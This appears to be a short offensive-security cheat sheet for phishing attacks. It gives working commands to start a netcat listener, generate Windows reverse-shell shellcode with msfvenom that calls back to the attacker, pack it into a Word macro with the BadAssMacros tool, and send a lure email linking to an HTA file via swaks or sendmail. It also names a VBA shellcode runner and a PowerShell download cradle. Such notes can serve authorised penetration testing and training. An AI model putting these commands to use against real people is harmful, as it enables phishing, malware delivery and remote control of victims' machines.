Phishing

Simple VBA Shell

S3cur3Th1sSh1t Reverse-Shell

nc -lvnp 8080  --- listener

BadAssMacro

BadAssMacros

Download BadAssMacrosx86.exe from the above repo.

  1. Create the raw shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f raw -o shellcode.raw
  1. Copy the out.txt into the Word file

.\BadAssMacrosx86.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Send the Email

swaks --body 'click me http://192.168.X.X/file.hta' --add-header "Really: 1.0" --add-header "Content-Type: text/html" --header "Subject: Important" -t victim@corp.com -f attacker@corp.com --server 192.168.X.X
sendmail -f attacker@email.com -t victim@email.com -s 192.168.x.x -u "Subject" -m "body"

Word Macro

  • VBA Shellcode Runner (x86)

  • VBA PowerShell Download Cradle

Last updated